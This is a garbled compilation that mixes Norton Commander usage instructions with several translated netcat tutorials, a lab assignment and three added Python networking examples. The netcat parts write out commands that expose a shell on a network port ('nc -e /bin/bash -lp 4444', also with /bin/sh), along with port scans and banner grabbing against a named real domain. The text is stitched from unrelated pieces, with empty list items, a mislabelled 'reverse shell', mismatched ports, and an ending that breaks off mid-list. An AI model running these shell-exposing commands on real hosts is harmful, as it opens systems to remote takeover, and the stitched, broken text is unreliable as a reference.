Basic NC commands are called by the function keys F1 - F10. A list of these commands is located on the bottom information line of the screen.

a) Hint (Help), F1 (Fig. 2, 3).

When you press this key, a brief description of the Norton Commander system appears on the screen, together with a hint describing the purpose of the keys and commands.

b) User menu (Menu), F2 (Fig. 4).

Using this command, an additional menu created by the user is called up on the screen.

c) Viewing the contents of a file (View), F3 (Fig. 5).

Place the cursor on the name of the file whose contents you want to view and press F3. The contents of the file are displayed on the screen, where they can be read but not edited.

d) Editing text (Edit), F4 (Fig. 6).

To load a file into the built-in Norton Commander editor, point to the file with the cursor and press F4. While editing, move the cursor with the cursor keys. The built-in Norton Commander editor can handle files no larger than 30 KB; for larger files an external editor is used, if one is configured in Norton Commander. To load a file into the external editor, use the command called by pressing Alt+F4.

e) Copying files and directories (Copy), F5 (Fig. 7, 8, 9).

To copy a file, you need to know the directory where it is located (the source) and the directory it will be copied to (the destination). Open the destination directory in the passive panel and the source directory in the active panel. In the latter, point the cursor at the file to be copied and press F5. In the dialog box that appears after pressing F5, confirm the copy. If necessary, you can correct the name of the destination directory here or give the copy a different name.

When copying a group of files, first mark them by moving the cursor to the name of each desired file and pressing the Insert key. The name of a marked file changes color and background. To unmark the file under the cursor, press Insert again. Copying is done by pressing F5. In the dialog box that appears, confirm the copy, whether of a single file or of a group of (all) files.

If you need to copy all the files in a directory, select them by pressing the * key on the small numeric keypad. To cancel the selection, press this key again.

If you need to copy all the files of a certain group, select them by pressing the + key on the small numeric keypad; in the dialog box that appears, enter the group pattern (file mask) and press Enter. Conversely, to cancel a selection, press the minus (-) key and press Enter.


To invert the selection, press the * key on the small numeric keypad.

The group patterns that can be given when copying are quite varied; some examples are shown in Table 1.

Table 1

Hello Dear Reader X!

I think this drawing could be called a mini-test, “Are you a hacker?”. Try to say what this funny kitten means. Well, if you still have difficulty, know that in front of you is the favorite thing of all advanced people who are in one way or another associated with the Network, and its name is Netcat.

Netcat is a utility that allows you to read and transfer data over network connections. In other words, Netcat allows you to connect to anything and do anything. Netcat is absolutely self-sufficient; if used correctly, it can replace any software tool, even the Apache you know. So, in its simplest form, Netcat allows you to create TCP and UDP connections from any port to any port; it can “listen” for incoming connections (and you can order the “kitten” to wait for connections only from the addresses and even ports you specify!), scan ports, perform DNS queries, send any commands from standard input, perform predefined actions in response to a connection the “kitten” is listening for, make a hex dump of sent and received data, and much, much more...

Although, I think it should have been said from the very beginning that Netcat can do everything, and the possibilities of its use are limited only by your knowledge and your imagination. Initially, Netcat was conceived as a Unix utility, but as you understand, there were bound to be enthusiasts who would port the “kitten” to Windows. You can easily find both versions in search engines with the query “Netcat”. But the advantage, of course, goes to Unix-oids, who can slightly tweak the “kitten” when compiling it and thereby activate the “additional features” that are disabled by default.

If you have ever used “software-based attacks”, or simply put exploits, then you probably noticed that more than half of them use Netcat in one way or another. This is primarily because Netcat never modifies incoming (or outgoing) data in any way, unlike, say, a Telnet client, which first interprets incoming data and only then gives it to you. This is why Netcat has become a powerful tool for finding and exploiting vulnerabilities, thanks to which Bugtraq has been replenished with hundreds of new postings.

But if searching for vulnerabilities is not your thing, you can try using Netcat as a web browser or, say, a mail client, especially since “fresh” holes have been found in Internet Explorer and Outlook, the good old Unicode one, heh... Moreover, our Russian guys distinguished themselves in this field (national pride plays a role!). If you are reading this article with Explorer, go and see how holey your “Donkey” is.

After this, you’ll switch to Netcat; it’s not very convenient, but safe... And finally, examples of “advanced” use of Netcat (Unix):

  1. Netcat like ;
  2. Netcat as utility " "; these are often described in X, but in reality they simply send requests to search engines well known to you... Your “kitten” can also do this useful work!;
  3. Netcat like ! Make the provider rest!!!

Please note that everything is done in the form of shell scripts, so you can correct anything if necessary.
For this I want to say goodbye. Read the manuals, and good luck in learning the iconic Netcat utility!

P.S./Personal/: The site http://georgy.h1.ru/ is closed by me. Once and for all. Thanks to everyone who was my guest.

In this article I will look at the popular network utility netcat and useful tricks when working with it.


Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data over them and transmit it. Despite its usefulness and simplicity, many do not know how to use it and undeservedly pass it over.


Using this utility, you can perform some steps of a penetration test. This is useful when the target machine has no extra packages installed (or installing them would attract attention), when there are restrictions (for example, on IoT/embedded devices), etc.


What you can do with netcat:

  • Scan ports;
  • Forward ports;
  • Collect service banners;
  • Listen on a port (bind a listener for a reverse connection);
  • Download and upload files;
  • Output raw HTTP content;
  • Create a mini-chat.

In general, with the help of netcat you can replace some of the Unix utilities, so this tool can be considered a kind of multi-tool for certain tasks.

Practical examples

In many cases, when a particular host needs to be checked, people use telnet or the service's own client to identify the host or read its banner. Here is how netcat can help us:

Checking for open TCP port 12345

$ nc -vn 192.168.1.100 12345
nc: connect to 192.168.1.100 12345 (tcp) failed: Connection refused

$ nc -v 192.168.1.100 22
Connection to 192.168.1.100 22 port succeeded!
SSH-2.0-OpenSSH

Scanning TCP ports with netcat:

$ nc -vnz 192.168.1.100 20-24

With -z, no data is sent over the connection; netcat only reports whether each connection attempt succeeded:


nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
found 0 associations
found 1 connections:
1: flags=82
outif en0
src 192.168.1.100 port 50168
dst 192.168.1.100 port 22
rank info not available
TCP aux info available
Connection to 192.168.1.100 port 22 succeeded!
nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 24 (tcp) failed: Connection refused

Scanning UDP ports.

Scanning UDP ports with nmap requires root privileges. If you don't have them, netcat can help here too:


$ nc -vnzu 192.168.1.100 5550-5560
Connection to 192.168.1.100 port 5555 succeeded!

Sending a UDP packet

$ echo -n "foo" | nc -u -w1 192.168.1.100 161

This can be useful when interacting with network devices.

Receiving data on a UDP port and outputting received data

$ nc -u localhost 7777

After the first message, output stops. If you need to accept multiple messages, wrap the command in a while true loop:


$ while true; do nc -u localhost 7777; done

File transfer. Using netcat you can both receive files and transfer them to a remote host:


nc 192.168.1.100 5555 < 1.txt
nc -lvp 5555 > /tmp/1.txt

Netcat as a simple web server.

Netcat can act as a simple web server to display HTML pages.


$ while true; do nc -lp 8888 < index.html; done

Open it in a browser at http://<netcat host>:8888/index.html. To use the standard web server port 80, you will have to run nc with root privileges:


$ while true; do sudo nc -lp 80 < test.html; done

Chat between nodes

On the first node (192.168.1.100):


$ nc -lp 9000

On the second node:


$ nc 192.168.1.100 9000

After executing the commands, all characters entered into the terminal window on any node will appear in the terminal window of the other node.

Reverse shell

Using netcat you can organize a convenient reverse shell:


nc -e /bin/bash -lp 4444

Now you can connect from the remote host:


$ nc 192.168.1.100 4444

You shouldn’t give up if you don’t have certain tools, often quite cumbersome; sometimes the problem can be solved with improvised means.

Instructions for working in Norton Commander

To start the NC system, type the NC command at the DOS command line or left-click the NC icon on the desktop. To finish working with NC, press [F10]. In the dialog box that appears, select “Yes” to exit the system, or “No” otherwise. An answer is selected with the cursor keys and then [Enter]. The bottom of the screen contains the DOS command line, where you can enter commands while working under NC. The lowest line of the screen is a hint line showing the purpose of the main “hot” keys, which correspond to NC (and DOS) commands.

After starting NC, two panels appear on the screen, left and right. At the top of each panel, a small rectangular window shows the full path to the current file or directory. The panel containing the highlighted rectangle (the cursor) is called active. To move from panel to panel, use the key . If the top line of the panel, showing “…”, is selected, this means you are in the directory whose name is shown at the top of the panel. The following commands are used to work with panels:

[Ctrl] + [F1] Hide/show left panel

[Ctrl] + [F2] Hide/show right panel

[Ctrl] + [U] Swap panels

[Ctrl] + [O] Hide/show both panels

[Ctrl] + [P] Hide/show inactive panel

To change the logical disk for the left panel, press [Alt] + [F1]; in the dialog box that appears, use the cursor keys to select the desired disk from the list offered and press [Enter]. For the right panel, the actions are similar, but you start by pressing [Alt] + [F2].

To enter a directory, select it on the active panel and press [Enter]. To go to the parent directory, select the line “…” on the active panel and press [Enter].

The following commands are used to work with directories:

[F7] – create a directory. In the dialog box that appears, specify the new directory name;

[F8] – delete a directory. In the dialog box that appears, confirm the deletion, or cancel it by pressing the Esc key.

The following commands are used to work with files:

[Shift] + [F4] – create a file. In the dialog box that appears, enter the new file name (don’t forget the extension). After the file name has been set, type the contents of the file in the screen workspace. Finish entering the file with [Ctrl] + [Z]. To save the file, press [F2]. Exit editing mode with [F10].

[F4] – edit a previously created document. In this case, specify the name of the file to be edited in the dialog box. When working in editing mode, a hint line at the bottom of the screen shows the hot keys for editing mode.

[Shift] + [F2] – save the file under a new name.

[F3] – view file contents. To do this, first select the file in the panel.

[F5] – copy a file. All operations with files and directories use both panels. To copy a file, on the inactive panel go to the directory where the copy will be placed. On the active panel, select the file to be copied and press [F5]. To confirm the copy, press [Enter]; to cancel – .

[F6] – move/rename a file. The operation is similar to copying. To move a file, on the inactive panel go to the directory where the file will be placed. In the active panel, select the file to be moved and press [F6]. To rename a file, specify the new file name in the dialog box, appending it after the ” \ ” character at the end of the path. Remember that a moved file is deleted from its original location.

[F9] – go to the NC menu.

Group operations on files

Copy, move, and delete operations can be performed on several files at once. To do this, mark them by highlighting each on the panel and pressing [Insert]. The selected files are highlighted with rectangles of a contrasting color. To remove the selection, repeat these steps. After the selection, the required operation (copy, move, delete) is performed on the group of files as if it were one file. The second way to select files is to press the large gray ”+” key on the function keyboard on the left. After pressing this key, specify the file name in the dialog box, or specify the file names with a mask: “ * ”, “ *.* ”, “ ? ”. To deselect files, use the “-” key on the function keyboard on the left.

System Menu NC

The menu system is designed to customize the shell and make operations easier. The menu bar is called up by pressing [F9]. The menu system consists of a menu bar and drop-down menus. The menu contains the following items: Left, Files, Commands, Settings, Right. The Left and Right commands determine the file display mode for the corresponding panel; all options for the left and right panels are identical. The Files command is for performing operations on files and directories. The Commands menu item is for executing additional commands. The Settings command is for setting up the NC environment. Select the appropriate command with the cursor keys and then press [Enter].

Menu item Left (Right).

The drop-down menu of this command contains options for selecting the format in which files are displayed on the screen. In Brief mode the panel displays only file and directory names. In Full mode the name of the file or directory is displayed together with, for a file, its size or, for a directory, the string “subdirectory”, and the date and time the file or directory was created. Tree mode displays the directory tree of the current drive, and the cursor can be moved through the tree to quickly find the required file. The next group of options for this menu item determines the order in which files are displayed on the panel. Files can be left in arbitrary order (No sorting mode) or arranged in a specific order: Name – by name in alphabetical order, Extension – by extension in alphabetical order, Time – by creation date, with the newest files at the beginning of the list, Size – by file size in descending order. Select the line of the desired mode with the cursor and set the checkbox with the space key.

Menu item Files .

The drop-down menu of this command describes the purpose of the hotkeys [F1] - [F8], i.e. the hotkey actions are duplicated by menu commands. The next option is Set Attributes. Attributes are set only for files. The procedure is as follows: select a file with the cursor on the panel. Then press [F9] to go to the NC menu and choose Files > Set Attributes. After pressing [Enter], a list of possible attributes appears in the dialog box: Read-only, Archive, Hidden, System. Select the attribute line with the cursor and check its box with the spacebar. A file with the Read-only attribute cannot be modified and is available only for viewing. A file with the Hidden attribute is marked on the panel with a small highlighted rectangle (if the Show hidden files option is not set in the screen settings, the file name is not displayed on the panel at all). The next group of commands allows you to select files (like the big gray ”+” key), deselect them (like the ”-” key on the function keyboard), and invert the selection (like the ”*” key on the function keyboard).

Menu item Commands.

The drop-down menu of this command allows you to create a user menu, edit this menu, view the history of commands entered at the DOS command line, and contains other additional features of the NC shell.

Menu item Settings.

The drop-down menu of this command allows you to configure the interface in a user-friendly manner. It contains the Settings Editor option and others. When you select the Settings menu item, a set of dialog boxes opens that lets you select a color scheme for the screen, set the number of lines on the screen, etc. The Panel Settings dialog box allows showing hidden files if the Show hidden files checkbox is checked (or hiding them otherwise). Option checkboxes are also set using the cursor and the spacebar.

Laboratory assignment

Displaying a test HTML page to a client with a regular browser with one command (port 8080):
(echo -e "HTTP/1.1 200 OK\nContent-Type: text/html\n\n Hello World";) | nc -vv -l -p 8080
Transferring a file to a client with a regular browser with one command (port 8080):
(echo -e "HTTP/1.1 200\nContent-Disposition: attachment; filename=target-name-that-client-will-see\nContent-Type: application/octet-stream\nConnection: close\n"; cat filename-on-disk) | nc -vv -l -p 8080
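The two one-liners above hand-build an HTTP response with bare "\n" line breaks and no Content-Length, so the browser only learns the body has ended when netcat closes the socket. The following is an added example (not part of the lab text, and not netcat's or the article's code) that frames the same kind of response the way HTTP expects: CRLF line endings, a Content-Length so the client knows where the body ends, Connection: close, and an optional Content-Disposition that turns the reply into a download. It serves one constructed page on a free localhost port and fetches it with Python's own http.client; the function names, the sample body and the filename-sanitising rule are all assumptions of this example.

```python
import http.client
import socket
import threading


def build_http_response(body, content_type="text/html; charset=utf-8", attachment_name=None):
    """Frame `body` as a minimal HTTP/1.1 response: CRLF line endings, a Content-Length
    so the client knows where the body ends, and Connection: close so it does not wait
    for more. attachment_name, when given, adds the Content-Disposition header that makes
    a browser save the body as a download instead of rendering it."""
    headers = [
        "HTTP/1.1 200 OK",
        f"Content-Type: {content_type}",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    if attachment_name is not None:
        # Keep only characters that cannot be read as a path separator, quote or
        # header break (constructed rule for this example, not an HTTP requirement).
        safe = "".join(c for c in attachment_name if c.isalnum() or c in "._-") or "download"
        headers.append(f'Content-Disposition: attachment; filename="{safe}"')
    return ("\r\n".join(headers) + "\r\n\r\n").encode("ascii") + body


def serve_once(response, host="127.0.0.1", port=0):
    """Bind immediately and return (bound_port, serve). serve() answers exactly one
    client with `response` and returns the request line it received."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(5)

    def serve():
        try:
            conn, _ = srv.accept()
        finally:
            srv.close()
        with conn:
            conn.settimeout(5)
            request = b""
            # Read the request head (up to the blank line) before answering.
            while b"\r\n\r\n" not in request and b"\n\n" not in request:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                request += chunk
            conn.sendall(response)
        return request.split(b"\n", 1)[0].strip().decode("latin-1", "replace")

    return srv.getsockname()[1], serve


def demo(attachment_name=None):
    """Serve a constructed page on a free localhost port and fetch it with http.client."""
    body = b"<html><body>Hello World</body></html>"  # constructed sample page
    port, serve = serve_once(build_http_response(body, attachment_name=attachment_name))
    worker = threading.Thread(target=serve, daemon=True)
    worker.start()
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/index.html")
    resp = conn.getresponse()
    data = resp.read()
    disposition = resp.getheader("Content-Disposition")
    conn.close()
    worker.join(5)
    return resp.status, data, disposition


if __name__ == "__main__":
    print(demo())
    print(demo(attachment_name="my report/2024.pdf"))
```

The Content-Length is what lets a client finish the download without relying on the socket closing, which is also why the one-liner version can leave a browser spinning when netcat does not exit after its stdin is exhausted.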

How to use nc?

(http://handynotes.ru/2010/01/unix-utility-netcat.html )

Let's start with a few simple examples and then use them as basic ones.
If you remember, I said that netcat is a Swiss army knife. What would this knife be if it couldn't be used as a regular knife? That is why netcat can be used instead of regular telnet:

$ nc www.google.com 80

It's actually more convenient than regular telnet because you can end the connection at any time by pressing Ctrl+C and it treats binary data as normal (no escape sequences, nothing).
You can add the -v option to display the results of actions in more detail, and the (-vv) option to get statistics about how many bytes were transferred during the current connection session.
Netcat can be used as a server. If you run it as below, it will listen on port 12345 (on all interfaces):

$ nc -l -p 12345

Now if you connect to port 12345 of this host, everything you type will be sent to the remote side, which tells us that netcat can be used as a chat server. Run on one of the computers:

# On computer A with IP 10.10.10.10
$ nc -l -p 12345

And connect to it from another:

# On computer B
$ nc 10.10.10.10 12345

Now both sides can talk!
This way of talking, where both parties can talk to each other, makes it possible to use nc for I/O operations over the network! For example, you can send an entire directory from one computer to another by running a tar pipeline via nc on the first computer, and redirecting the output to another tar process on the second.
Let's say you want to send files from the /data directory of computer A with IP 192.168.1.10 to computer B (with any IP). It's simple:


# On computer A with IP 192.168.1.10
$ tar -cf - /data | nc -l -p 6666


# On computer B
$ nc 192.168.1.10 6666 | tar -xf -

Don't forget to combine the pipeline with Pipe Viewer, which was described in the previous article, to see statistics on how quickly the transfer occurs!
A single file can be sent more simply:

# On computer A with IP 192.168.1.10
$ cat file | nc -l -p 6666


# On computer B
$ nc 192.168.1.10 6666 > file

You can even copy and restore an entire disk using nc:

# On computer A with IP 192.168.1.10
$ cat /dev/hdb | nc -l -p 6666


# On computer B
$ nc 192.168.1.10 6666 > /dev/hdb

Note: the “-l” option cannot be used together with “-p” on Mac computers! The solution is simply to replace “-l -p 6666” with “-l 6666”, like here:

# now nc listens on port 6666 for Mac computers
$ nc -l 6666

A common use of netcat is port scanning. Netcat is not the best tool for this kind of work, but it gets the job done (the best, of course, is nmap):

$ nc -v -n -z -w 1 192.168.1.2 1-1000
(UNKNOWN) 445 (microsoft-ds) open
(UNKNOWN) 139 (netbios-ssn) open
(UNKNOWN) 111 (sunrpc) open
(UNKNOWN) 80 (www) open
(UNKNOWN) 25 (smtp) : Connection timed out
(UNKNOWN) 22 (ssh) open
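The scan listings on this page come in two dialects: the macOS/BSD netcat output shown earlier (verbose "connectx ... failed" diagnostics mixed with "Connection to ... succeeded!") and the GNU-style "(UNKNOWN) port (service) open" lines just above. When such output is kept as evidence or diffed against an allow-list of expected services, the first job is to turn it into a port-to-state map. The parser below is an added example, not code from either article; the sample lines are constructed after the two formats on the page, and the function names and the "closed"/"filtered" labels (refused means something answered with a reset, timed out means nothing answered) are this example's own choices.

```python
import re

# Constructed sample output in the two dialects shown on this page:
# BSD/macOS nc (verbose "connectx" diagnostics, "Connection to ... succeeded!")
# and the older GNU-style nc ("(UNKNOWN) [host] port (service) open").
SAMPLE_BSD = """\
nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
found 0 associations
found 1 connections:
     1: flags=82
Connection to 192.168.1.100 port 22 succeeded!
nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.1.100 port 24 (tcp) failed: Operation timed out
"""

SAMPLE_GNU = """\
(UNKNOWN) [192.168.1.2] 445 (microsoft-ds) open
(UNKNOWN) [192.168.1.2] 139 (netbios-ssn) open
(UNKNOWN) 25 (smtp) : Connection timed out
(UNKNOWN) [192.168.1.2] 22 (ssh) open
"""

# "Connection to H port P succeeded!" or the older "Connection to H P port succeeded!"
BSD_OK = re.compile(r"Connection to \S+ (?:port (\d+)|(\d+) port)(?: \[[^\]]*\])? succeeded")
# "connect to H port P (tcp) failed: <reason>" (macOS spells it "connectx")
BSD_FAIL = re.compile(r"connectx? to \S+ (?:port )?(\d+) \((?:tcp|udp)\) failed: (.+)")
# "(UNKNOWN) [H] P (service) open" or "(UNKNOWN) P (service) : Connection timed out"
GNU_LINE = re.compile(r"^\([^)]*\)(?: \[[^\]]+\])? (\d+) \([^)]*\) (.+)$")


def classify_failure(reason):
    """Map a failure reason to the state a scanner would report."""
    reason = reason.lower()
    if "refused" in reason:
        return "closed"      # a reset came back: host is up, nothing listening
    if "timed out" in reason:
        return "filtered"    # no answer at all: typically a firewall drop
    return "error"


def parse_nc_scan(text):
    """Return {port: state} for every port line in `nc -v -z` output, ignoring noise lines."""
    states = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = BSD_OK.search(line)
        if m:
            states[int(m.group(1) or m.group(2))] = "open"
            continue
        m = BSD_FAIL.search(line)
        if m:
            states[int(m.group(1))] = classify_failure(m.group(2))
            continue
        m = GNU_LINE.match(line)
        if m:
            port, rest = int(m.group(1)), m.group(2)
            states[port] = "open" if rest == "open" else classify_failure(rest)
    return states


def open_ports(text):
    """Sorted list of ports reported open, the usual thing to diff against an allow-list."""
    return sorted(p for p, s in parse_nc_scan(text).items() if s == "open")


if __name__ == "__main__":
    for name, sample in (("bsd", SAMPLE_BSD), ("gnu", SAMPLE_GNU)):
        print(name, parse_nc_scan(sample), "open:", open_ports(sample))
```

Lines that carry no port verdict ("found 1 connections:", the flags dump) fall through all three patterns and are ignored, so the same function works on either dialect without first guessing which netcat produced the output.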

The -n option prevents DNS lookups, -z does not wait for a response from the server, and -w 1 sets the connection timeout to 1 second.
Another non-trivial use of netcat is as a proxy. Both port and host can be forwarded. Look at this example:

$ nc -l -p 12345 | nc www.google.com 80

This command runs nc on port 1234 and redirects all connections to google.com:80. If you now connect to this computer on port 12345 and make a request, you will find that you do not receive any data in response. This is correct because we have not established a bidirectional channel. If you add a second channel, you will receive your data on a different port:

$ nc -l -p 12345 | nc www.google.com 80 | nc -l -p 12346

After sending a request to port 12345, receive your response data on port 12346.
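The point of the two-port trick above is that a single `nc | nc` pipe carries bytes in one direction only; a usable proxy needs the reply path as well. The following is an added example, not code from the article or from netcat, of the same splice done properly in Python: one listening port, and two copy loops that pump bytes in both directions and propagate end-of-stream so neither side hangs. A constructed echo service on localhost stands in for www.google.com:80, and the function names are this example's own.

```python
import socket
import threading


def pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then close dst's write side
    so the peer sees EOF too (this is what a single `nc | nc` pipe never does)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _listener(host, port):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(5)
    return srv


def relay_once(listen_host, listen_port, target_host, target_port):
    """Bind now and return (bound_port, serve). serve() accepts one client and
    splices it to the target in BOTH directions, like the two-nc trick but on one port."""
    srv = _listener(listen_host, listen_port)

    def serve():
        try:
            client, _ = srv.accept()
        finally:
            srv.close()
        client.settimeout(5)
        upstream = socket.create_connection((target_host, target_port), timeout=5)
        forward = threading.Thread(target=pump, args=(client, upstream))
        backward = threading.Thread(target=pump, args=(upstream, client))
        forward.start()
        backward.start()
        forward.join()
        backward.join()
        client.close()
        upstream.close()

    return srv.getsockname()[1], serve


def echo_once(host="127.0.0.1"):
    """Constructed stand-in for the remote service: echoes one client's bytes back."""
    srv = _listener(host, 0)

    def serve():
        try:
            conn, _ = srv.accept()
        finally:
            srv.close()
        with conn:
            conn.settimeout(5)
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    return srv.getsockname()[1], serve


def demo(payload=b"ping"):
    """Send payload through the relay to the echo service and return what comes back."""
    echo_port, echo_serve = echo_once()
    relay_port, relay_serve = relay_once("127.0.0.1", 0, "127.0.0.1", echo_port)
    threads = [threading.Thread(target=echo_serve, daemon=True),
               threading.Thread(target=relay_serve, daemon=True)]
    for t in threads:
        t.start()
    with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # done sending; now wait for the reply and EOF
        reply = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    for t in threads:
        t.join(5)
    return reply


if __name__ == "__main__":
    print(demo(b"hello through the relay"))
```

Half-closing with SHUT_WR rather than closing outright is what lets the client's EOF reach the service and the service's EOF come back to the client; without it, the relay would have to guess when a conversation is over, which is exactly the ambiguity the page's one-directional pipe runs into.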
Probably the most powerful feature of netcat is to run any process as a server:

$ nc -l -p 12345 -e /bin/bash

The -e option causes input and output to be redirected through the network socket. Now, if you connect to the host on port 12345, you can use bash:
$ nc localhost 12345
ls -las
total 4288
4 drwxr-xr-x 15 pkrumins users 4096 2009-02-17 07:47 .
4 drwxr-xr-x  4 pkrumins users 4096 2009-01-18 21:22 ..
8 -rw-------  1 pkrumins users 8192 2009-02-16 19:30 .bash_history
4 -rw-r--r--  1 pkrumins users  220 2009-01-18 21:04 .bash_logout

(http://execbit.ru/2011/05/23/netcat/)
1. Transfer files (run the first command on the receiving machine, the second on the sending machine):

$ nc -l 31334 > filename
$ nc 172.16.69.143 31334 < filename

$ nc -f /var/log/messages | nc -l 31334
$ nc 172.16.69.143 31334

3. Use instead of telnet (the first is the telnet server, the second the client):

$ nc -l -p 31334 -e /bin/sh
$ nc 172.16.69.143 31334

4. Scan for open ports:

$ nc -z execbit.ru 1-1024

5. Fingerprint services from their banners:

$ echo "QUIT" | nc execbit.ru 1-1024

6. Organize a reverse shell (the first is the client, the second is the server, but the shell will open from the server to the client).